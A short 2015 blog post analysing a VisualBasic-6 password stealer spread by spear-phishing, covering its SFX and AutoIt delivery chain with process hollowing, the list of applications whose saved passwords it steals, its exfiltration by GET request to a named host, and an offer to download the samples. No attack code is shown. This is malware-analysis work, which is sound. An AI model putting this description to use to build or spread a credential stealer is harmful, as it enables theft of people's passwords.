Tuesday, February 24, 2015

Quick analysis of a VisualBasic based Password-Stealer

After the analysis of Golroted i was able to get the key to the attacker's server (actually they gave it to me by embedding it in the code isn't it), using that key i was able to spot an email-message that was used in a spear-phishing campaign.
Spam message
The email-message had an attachment file that i am going to analyze in this post.

The attachment file was a SFX archive that once executes dropped an innocent AutoIt executable in addition to three other files.
Archive content
After the SFX executed the AutoIt executable with one of the files (scripts, that was part of the same archive) as argument, the executed script was responsible for creating a new process (using the process-hollowing method) that run the actual VB based malware (you can read some info about it in this Polish CERT post).

The VB malware (Sophos names it Mdrop) is actually a simple Password-Stealer that try to steal passwords from the following software:

  • Trillian
  • IDM (Internet Download Manager) - usually used to manage passwords for file-sharing web sites (rapidshare.com, uploadable.ch etc)
  • JDownloader (it does it as seen here)
  • FileZilla
  • Yahoo! Messanger
  • Pidgin
  • MSN
  • VPN settings (saved in rasbphone.pbk files)
In addition to the above list the file has the famous WebBrowserPassView and MailPassView  software in its resource section.

The malware itself is simple and boring but here i had a chance to test my VB reversing skills, since it is not a secret that opening a VB-6 based binary in IDA is not going to get you any further in the analysis process i used VB-Decompiler and i was able to decompile the binary to a stage where i can understand most of its functionality just by looking at the code. As we can see in the CallAPI function for example:

You really don't need more than that in order find the source code on the web although for a more serious RE where you need to understand the bits and bytes it won't be enough.

In order to send the stolen passwords to the server it uses a simple GET request (sab3.netau.net) that contains the application name, username, password and the computer name of the victim.

Overall this malware is just a copy-paste work from the web and there is nothing new that is worth mentioning, but for me it was a good exercise on how to deal with AutoIt based packer(?) and how to decompile VisualBasic-6 code.

You can download the original SFX archive and the dumped VB based binary from here.


No comments:

Post a Comment